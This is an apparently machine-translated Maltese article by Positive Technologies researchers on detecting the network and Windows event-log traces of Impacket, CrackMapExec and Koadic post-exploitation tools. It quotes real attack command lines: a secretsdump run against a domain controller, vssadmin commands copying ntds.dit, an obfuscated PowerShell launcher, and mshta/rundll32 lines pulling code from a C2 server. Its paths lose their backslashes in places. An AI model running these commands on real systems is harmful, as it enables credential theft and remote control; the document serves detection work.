In-numru ta' attakki fis-settur korporattiv qed jikber kull sena: per eżempju milli fl-2016, u fl-aħħar tal-2018 - milli fil-perjodu preċedenti. Inklużi dawk fejn l-għodda tax-xogħol prinċipali hija s-sistema operattiva Windows. Fl-2017-2018, l-APT Dragonfly, APT28, wettaq attakki fuq organizzazzjonijiet governattivi u militari fl-Ewropa, fl-Amerika ta’ Fuq u fl-Arabja Sawdija. U użajna tliet għodod għal dan - , и . Il-kodiċi tas-sors tagħhom huwa miftuħ u disponibbli fuq GitHub.
Ta 'min jinnota li dawn l-għodod mhumiex użati għall-penetrazzjoni inizjali, iżda biex jiżviluppaw attakk fi ħdan l-infrastruttura. L-attakkanti jużawhom fi stadji differenti tal-attakk wara l-penetrazzjoni tal-perimetru. Dan, mill-mod, huwa diffiċli biex jinstab u ħafna drabi biss bl-għajnuna tat-teknoloġija jew għodod li jippermettu . L-għodod jipprovdu varjetà ta 'funzjonijiet, mit-trasferiment ta' fajls għal interazzjoni mar-reġistru u l-eżekuzzjoni ta 'kmandi fuq magna remota. Aħna wettaqna studju ta 'dawn l-għodod biex jiddeterminaw l-attività tan-netwerk tagħhom.
Dak li kellna nagħmlu:
- Ifhem kif jaħdmu l-għodod tal-hacking. Skopri liema attakkanti għandhom bżonn jisfruttaw u liema teknoloġiji jistgħu jużaw.
- Sib dak li ma jinstabx mill-għodod tas-sigurtà tal-informazzjoni fl-ewwel stadji ta 'attakk. Il-fażi ta' tkixxif tista' tinqabeż, jew minħabba li l-attakkant huwa attakkant intern, jew minħabba li l-attakkant qed jisfrutta toqba fl-infrastruttura li ma kinitx magħrufa qabel. Isir possibbli li tiġi restawrata l-katina kollha ta 'l-azzjonijiet tiegħu, għalhekk ix-xewqa li tiskopri aktar moviment.
- Elimina l-pożittivi foloz minn għodod ta 'skoperta ta' intrużjoni. Ma rridux ninsew li meta ċerti azzjonijiet jiġu skoperti fuq il-bażi ta' tkixxif biss, żbalji frekwenti huma possibbli. Normalment fl-infrastruttura hemm numru suffiċjenti ta 'modi, li ma jistgħux jiġu distinti minn dawk leġittimi mal-ewwel daqqa t'għajn, biex tinkiseb kwalunkwe informazzjoni.
X'jagħti dawn l-għodda lill-attakkanti? Jekk dan huwa Impacket, allura l-attakkanti jirċievu librerija kbira ta 'moduli li jistgħu jintużaw fi stadji differenti tal-attakk li jsegwu wara li jinkisru l-perimetru. Ħafna għodod jużaw moduli Impacket internament - pereżempju, Metasploit. Għandu dcomexec u wmiexec għall-eżekuzzjoni tal-kmand mill-bogħod, secretsdump biex tikseb kontijiet mill-memorja li huma miżjuda minn Impacket. Bħala riżultat, skoperta korretta ta 'l-attività ta' tali librerija se tiżgura l-iskoperta ta 'derivattivi.
Mhux ta 'kumbinazzjoni li l-ħallieqa kitbu "Powered by Impacket" dwar CrackMapExec (jew sempliċiment CME). Barra minn hekk, CME għandha funzjonalità lesta għal xenarji popolari: Mimikatz għall-kisba tal-passwords jew il-hashes tagħhom, implimentazzjoni ta 'Meterpreter jew aġent Empire għall-eżekuzzjoni remota, u Bloodhound abbord.
It-tielet għodda li għażilna kienet Koadic. Huwa pjuttost reċenti, ġie ppreżentat fil-konferenza internazzjonali tal-hackers DEFCON 25 fl-2017 u huwa distint minn approċċ mhux standard: jaħdem permezz ta 'HTTP, Java Script u Microsoft Visual Basic Script (VBS). Dan l-approċċ jissejjaħ jgħixu barra l-art: l-għodda tuża sett ta 'dipendenzi u libreriji mibnija fil-Windows. Il-ħallieqa jsejħulha COM Command & Control, jew C3.
IMPATT
Il-funzjonalità ta 'Impacket hija wiesgħa ħafna, li tvarja minn tkixxif ġewwa AD u ġbir ta' data minn servers MS SQL interni, għal tekniki għall-kisba ta 'kredenzjali: dan huwa attakk ta' relay SMB, u l-kisba tal-fajl ntds.dit li fih hashes ta 'passwords tal-utent minn kontrollur tad-dominju. Impacket tesegwixxi wkoll kmandi mill-bogħod billi tuża erba 'metodi differenti: WMI, Windows Scheduler Management Service, DCOM, u SMB, u teħtieġ kredenzjali biex tagħmel dan.
Secretsdump
Ejja nagħtu ħarsa lejn secretsdump. Dan huwa modulu li jista 'jimmira kemm magni tal-utent kif ukoll kontrolluri tad-dominju. Jista 'jintuża biex jikseb kopji ta' żoni tal-memorja LSA, SAM, SIGURTÀ, NTDS.dit, sabiex ikun jista 'jidher fi stadji differenti tal-attakk. L-ewwel pass fit-tħaddim tal-modulu huwa l-awtentikazzjoni permezz tal-SMB, li teħtieġ jew il-password tal-utent jew il-hash tiegħu biex iwettaq awtomatikament l-attakk Pass the Hash. Sussegwentement tiġi talba biex tiftaħ aċċess għal Service Control Manager (SCM) u tikseb aċċess għar-reġistru permezz tal-protokoll winreg, li permezz tiegħu attakkant jista 'jsib id-dejta tal-fergħat ta' interess u jikseb riżultati permezz ta 'SMB.
Fil-Fig. 1 naraw kif eżattament meta tuża l-protokoll winreg, l-aċċess jinkiseb billi tuża ċavetta tar-reġistru b'LSA. Biex tagħmel dan, uża l-kmand DCERPC b'opcode 15 - OpenKey.
Ross. 1. Ftuħ ċavetta tar-reġistru billi tuża l-protokoll winreg
Sussegwentement, meta jinkiseb aċċess għaċ-ċavetta, il-valuri jiġu ffrankati bil-kmand SaveKey b'opcode 20. Impacket jagħmel dan b'mod speċifiku ħafna. Tissejvja l-valuri f'fajl li ismu huwa sensiela ta' 8 karattri każwali mehmuża b'.tmp. Barra minn hekk, aktar upload ta 'dan il-fajl iseħħ permezz ta' SMB mid-direttorju System32 (Fig. 2).
Ross. 2. Skema biex tinkiseb ċavetta tar-reġistru minn magna remota
Jirriżulta li attività bħal din fuq in-netwerk tista 'tiġi skoperta minn mistoqsijiet lil ċerti fergħat tar-reġistru li jużaw il-protokoll winreg, ismijiet speċifiċi, kmandi u l-ordni tagħhom.
Dan il-modulu jħalli wkoll traċċi fil-ġurnal tal-avvenimenti tal-Windows, li jagħmilha faċli biex jinstab. Per eżempju, bħala riżultat ta 'eżekuzzjoni tal-kmand
secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DCFir-reġistru tal-Windows Server 2016 se naraw is-sekwenza ewlenija ta 'avvenimenti li ġejja:
1. 4624 - Logon mill-bogħod.
2. 5145 - verifika tad-drittijiet ta 'aċċess għas-servizz remot winreg.
3. 5145 - verifika tad-drittijiet ta 'aċċess għall-fajl fid-direttorju System32. Il-fajl għandu l-isem każwali msemmi hawn fuq.
4. 4688 - ħolqien ta' proċess cmd.exe li jniedi vssadmin:
“C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat5. 4688 - ħolqien ta 'proċess bil-kmand:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat6. 4688 - ħolqien ta 'proċess bil-kmand:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat7. 4688 - ħolqien ta 'proċess bil-kmand:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.batSmbexec
Bħal ħafna għodod ta 'wara l-isfruttament, Impacket għandu moduli għall-eżekuzzjoni remota tal-kmandi. Aħna ser niffukaw fuq smbexec, li jipprovdi qoxra ta 'kmand interattiva fuq magna remota. Dan il-modulu jeħtieġ ukoll awtentikazzjoni permezz SMB, jew b'password jew hash tal-password. Fil-Fig. Fil-Figura 3 naraw eżempju ta 'kif taħdem għodda bħal din, f'dan il-każ huwa l-console tal-amministratur lokali.
Ross. 3. Interactive smbexec console
L-ewwel pass ta 'smbexec wara l-awtentikazzjoni huwa li tiftaħ l-SCM bil-kmand OpenSCManagerW (15). Il-mistoqsija hija notevoli: il-qasam MachineName huwa DUMMY.
Ross. 4. Talba biex tiftaħ Service Control Manager
Sussegwentement, is-servizz jinħoloq bl-użu tal-kmand CreateServiceW (12). Fil-każ ta 'smbexec, nistgħu naraw l-istess loġika tal-kostruzzjoni tal-kmand kull darba. Fil-Fig. 5 aħdar jindika parametri ta 'kmand li ma jinbidlux, isfar jindika dak li attakkant jista' jbiddel. Huwa faċli li wieħed jara li l-isem tal-fajl eżekutibbli, id-direttorju tiegħu u l-fajl tal-output jistgħu jinbidlu, iżda l-bqija huwa ħafna aktar diffiċli biex jinbidel mingħajr ma tfixkel il-loġika tal-modulu Impacket.
Ross. 5. Talba biex jinħoloq servizz billi tuża Service Control Manager
Smbexec iħalli wkoll traċċi ovvji fil-ġurnal tal-avvenimenti tal-Windows. Fil-log Windows Server 2016 għall-qoxra tal-kmand interattiv bil-kmand ipconfig, se naraw is-sekwenza ewlenija ta 'avvenimenti li ġejja:
1. 4697 — installazzjoni tas-servizz fuq il-magna tal-vittma:
%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
2. 4688 - ħolqien tal-proċess cmd.exe bl-argumenti mill-punt 1.
3. 5145 - verifika tad-drittijiet ta' aċċess għall-fajl __output fid-direttorju C$.
4. 4697 — installazzjoni tas-servizz fuq il-magna tal-vittma.
%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
5. 4688 - ħolqien tal-proċess cmd.exe bl-argumenti mill-punt 4.
6. 5145 - verifika tad-drittijiet ta' aċċess għall-fajl __output fid-direttorju C$.
Impacket huwa l-bażi għall-iżvilupp ta 'għodod ta' attakk. Jappoġġja kważi l-protokolli kollha fl-infrastruttura tal-Windows u fl-istess ħin għandu l-karatteristiċi karatteristiċi tiegħu stess. Hawn huma talbiet speċifiċi tal-winreg, u l-użu tal-API SCM b'formazzjoni ta 'kmand karatteristika, u l-format tal-isem tal-fajl, u sehem SMB SYSTEM32.
CRACKMAPEXEC
L-għodda CME hija mfassla primarjament biex awtomat dawk l-azzjonijiet ta’ rutina li attakkant irid iwettaq biex javvanza fin-netwerk. Jippermettilek taħdem flimkien mal-aġent tal-Imperu magħruf u Meterpreter. Biex tesegwixxi kmandi bil-moħbi, CME jista' jħaffefhom. Bl-użu ta 'Bloodhound (għodda separata ta' tkixxif), attakkant jista 'awtomatizza t-tfittxija għal sessjoni ta' amministratur tad-dominju attiv.
Demm tad-demm
Bloodhound, bħala għodda waħedha, tippermetti tkixxif avvanzat fin-netwerk. Jiġbor data dwar utenti, magni, gruppi, sessjonijiet u huwa fornut bħala script PowerShell jew fajl binarju. Il-protokolli bbażati fuq LDAP jew SMB jintużaw biex tinġabar l-informazzjoni. Il-modulu ta 'integrazzjoni CME jippermetti li Bloodhound jitniżżel fil-magna tal-vittma, iħaddem u jirċievi d-dejta miġbura wara l-eżekuzzjoni, u b'hekk awtomatizza l-azzjonijiet fis-sistema u tagħmilhom inqas notevoli. Il-qoxra grafika ta 'Bloodhound tippreżenta d-dejta miġbura fil-forma ta' graffs, li tippermettilek issib l-iqsar triq mill-magna tal-attakkant għall-amministratur tad-dominju.
Ross. 6. Bloodhound Interface
Biex jaħdem fuq il-magna tal-vittma, il-modulu joħloq kompitu billi juża ATSVC u SMB. ATSVC huwa interface biex taħdem mal-Windows Task Scheduler. CME juża l-funzjoni NetrJobAdd(1) tiegħu biex joħloq kompiti fuq in-netwerk. Eżempju ta’ dak li jibgħat il-modulu CME jidher fil-Fig. 7: Din hija sejħa ta 'kmand cmd.exe u kodiċi offuskat fil-forma ta' argumenti f'format XML.
Fig.7. Ħolqien ta 'kompitu permezz ta' CME
Wara li l-kompitu ġie sottomess għall-eżekuzzjoni, il-magna tal-vittma tibda Bloodhound innifsu, u dan jista 'jidher fit-traffiku. Il-modulu huwa kkaratterizzat minn mistoqsijiet LDAP biex jinkisbu gruppi standard, lista tal-magni u l-utenti kollha fid-dominju, u tinkiseb informazzjoni dwar sessjonijiet tal-utenti attivi permezz tat-talba SRVSVC NetSessEnum.
Ross. 8. Il-ksib ta' lista ta' sessjonijiet attivi permezz ta' SMB
Barra minn hekk, it-tnedija ta' Bloodhound fuq magna tal-vittma b'verifika attivata hija akkumpanjata minn avveniment b'ID 4688 (ħolqien tal-proċess) u l-isem tal-proċess «C:WindowsSystem32cmd.exe». Dak li huwa notevoli dwarha huma l-argumenti tal-linja tal-kmand:
cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "Enum_avproducts
Il-modulu enum_avproducts huwa interessanti ħafna mil-lat tal-funzjonalità u l-implimentazzjoni. WMI jippermettilek tuża l-lingwa tal-mistoqsija WQL biex tirkupra data minn diversi oġġetti tal-Windows, li huwa essenzjalment dak li juża dan il-modulu CME. Jiġġenera mistoqsijiet lill-klassijiet AntiSpywareProduct u AntiМirusProduct dwar l-għodod ta 'protezzjoni installati fuq il-magna tal-vittma. Sabiex tikseb id-dejta meħtieġa, il-modulu jgħaqqad mal-ispazju tal-isem rootSecurityCenter2, imbagħad jiġġenera mistoqsija WQL u jirċievi tweġiba. Fil-Fig. Il-Figura 9 turi l-kontenut ta’ tali talbiet u tweġibiet. Fl-eżempju tagħna, instab Windows Defender.
Ross. 9. Attività tan-netwerk tal-modulu enum_avproducts
Ħafna drabi, l-awditjar tal-WMI (Trace WMI-Activity), li fl-avvenimenti tiegħu tista' ssib informazzjoni utli dwar mistoqsijiet WQL, jista' jkun diżattivat. Imma jekk tkun attivata, allura jekk titħaddem l-iskrittura enum_avproducts, jiġi ssejvjat avveniment b'ID 11. Dan se jkun fih l-isem tal-utent li bagħat it-talba u l-isem fl-ispazju tal-isem rootSecurityCenter2.
Kull wieħed mill-moduli CME kellu l-artifacts tiegħu stess, kemm jekk ikunu mistoqsijiet WQL speċifiċi jew il-ħolqien ta 'ċertu tip ta' kompitu fi skedar tal-kompiti b'obfuscation u attività speċifika għal Bloodhound f'LDAP u SMB.
KOADIC
Karatteristika distintiva ta 'Koadic hija l-użu ta' interpreti JavaScript u VBScript mibnija fil-Windows. F'dan is-sens, issegwi t-tendenza tal-għixien off-art - jiġifieri, m'għandha l-ebda dipendenzi esterni u tuża għodod standard tal-Windows. Din hija għodda għal Kmand u Kontroll (CnC) sħiħ, peress li wara l-infezzjoni jiġi installat "impjant" fuq il-magna, li jippermetti li tiġi kkontrollata. Magna bħal din, fit-terminoloġija Koadic, tissejjaħ "zombie." Jekk ma jkunx hemm privileġġi biżżejjed għal tħaddim sħiħ min-naħa tal-vittma, Koadic għandu l-abbiltà li jgħollihom bl-użu ta 'tekniki ta' bypass tal-Kontroll tal-Utent (bypass UAC).
Ross. 10. Koadic Shell
Il-vittma trid tibda komunikazzjoni mas-server ta' Kmand u Kontroll. Biex tagħmel dan, hija teħtieġ tikkuntattja URI ippreparat qabel u tirċievi l-korp ewlieni Koadic billi tuża waħda mill-istagers. Fil-Fig. Figura 11 turi eżempju għall-mshta stager.
Ross. 11. Inizjalizza sessjoni mas-server CnC
Ibbażat fuq il-varjabbli tar-rispons WS, jidher ċar li l-eżekuzzjoni sseħħ permezz ta 'WScript.Shell, u l-varjabbli STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE fihom informazzjoni ewlenija dwar il-parametri tas-sessjoni attwali. Dan huwa l-ewwel par talba-rispons f'konnessjoni HTTP ma 'server CnC. It-talbiet sussegwenti huma direttament relatati mal-funzjonalità tal-moduli msejħa (impjanti). Il-moduli Koadic kollha jaħdmu biss b'sessjoni attiva b'CnC.
Mimikatz
Eżatt bħal CME jaħdem ma 'Bloodhound, Koadic jaħdem ma' Mimikatz bħala programm separat u għandu diversi modi biex iniedih. Hawn taħt hemm par talba-rispons għat-tniżżil tal-impjant Mimikatz.
Ross. 12. Ittrasferixxi lil Mimikatz lil Koadic
Tista' tara kif inbidel il-format tal-URI fit-talba. Issa fih valur għall-varjabbli csrf, li hija responsabbli għall-modulu magħżul. Toqgħodx attenta għal isimha; Ilkoll nafu li s-CSRF normalment jinftiehem b'mod differenti. Ir-rispons kien l-istess korp ewlieni ta 'Koadic, li miegħu ġie miżjud kodiċi relatat ma' Mimikatz. Huwa pjuttost kbir, allura ejja nħarsu lejn il-punti ewlenin. Hawnhekk għandna l-librerija Mimikatz kodifikata f'base64, klassi .NET serializzata li se tinjettaha, u argumenti biex tniedi Mimikatz. Ir-riżultat tal-eżekuzzjoni jiġi trażmess fuq in-netwerk f'test ċar.
Ross. 13. Riżultat tat-tħaddim ta 'Mimikatz fuq magna remota
Exec_cmd
Koadic għandu wkoll moduli li jistgħu jesegwixxu kmandi mill-bogħod. Hawnhekk se naraw l-istess metodu ta 'ġenerazzjoni URI u l-varjabbli sid u csrf familjari. Fil-każ tal-modulu exec_cmd, il-kodiċi huwa miżjud mal-korp li huwa kapaċi jeżegwixxi kmandi tal-qoxra. Hawn taħt jidher kodiċi bħal dan li jinsab fir-rispons HTTP tas-server CnC.
Ross. 14. Kodiċi tal-impjant exec_cmd
Il-varjabbli GAWTUUGCFI bl-attribut WS familjari hija meħtieġa għall-eżekuzzjoni tal-kodiċi. Bl-għajnuna tiegħu, l-impjant isejjaħ il-qoxra, jipproċessa żewġ fergħat ta 'kodiċi - shell.exec bir-ritorn tal-fluss tad-data tal-ħruġ u shell.run mingħajr ma jirritornaw.
Koadic mhix għodda tipika, iżda għandha l-artifacts tagħha stess li bihom tista 'tinstab fi traffiku leġittimu:
- formazzjoni speċjali ta' talbiet HTTP,
- billi tuża winHttpRequests API,
- ħolqien ta' oġġett WScript.Shell permezz ta' ActiveXObject,
- korp eżekutibbli kbir.
Il-konnessjoni inizjali tinbeda mill-staster, għalhekk huwa possibbli li tiskopri l-attività tagħha permezz ta 'avvenimenti tal-Windows. Għal mshta, dan huwa l-avveniment 4688, li jindika l-ħolqien ta 'proċess bl-attribut tal-bidu:
C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6Waqt li Koadic ikun qed jaħdem, tista' tara 4688 avvenimenti oħra b'attributi li jikkaratterizzawh perfettament:
rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1Sejbiet
It-tendenza li tgħix fuq l-art qed tikseb popolarità fost il-kriminali. Huma jużaw l-għodod u l-mekkaniżmi mibnija fil-Windows għall-bżonnijiet tagħhom. Qed naraw għodod popolari Koadic, CrackMapExec u Impacket li jsegwu dan il-prinċipju jidhru dejjem aktar fir-rapporti tal-APT. In-numru ta 'frieket fuq GitHub għal dawn l-għodod qed jikber ukoll, u oħrajn ġodda qed jidhru (diġà hemm madwar elf minnhom issa). It-tendenza qed tikseb popolarità minħabba s-sempliċità tagħha: l-attakkanti m'għandhomx bżonn għodod ta 'partijiet terzi; huma diġà fuq il-magni tal-vittmi u jgħinuhom jaħarbu l-miżuri tas-sigurtà. Aħna niffukaw fuq l-istudju tal-komunikazzjoni tan-netwerk: kull għodda deskritta hawn fuq tħalli t-traċċi tagħha fit-traffiku tan-netwerk; studju dettaljat tagħhom ippermetta li ngħallmu l-prodott tagħna tiskoprihom, li fl-aħħar mill-aħħar jgħin biex tiġi investigata l-katina kollha ta’ inċidenti ċibernetiċi li jinvolvuhom.
Awturi:
- Anton Tyurin, Kap tad-Dipartiment tas-Servizzi tal-Esperti, Ċentru tas-Sigurtà tal-Esperti PT, Teknoloġiji Pożittivi
- Egor Podmokov, espert, Ċentru tas-Sigurtà tal-Esperti PT, Teknoloġiji Pożittivi
Sors: www.habr.com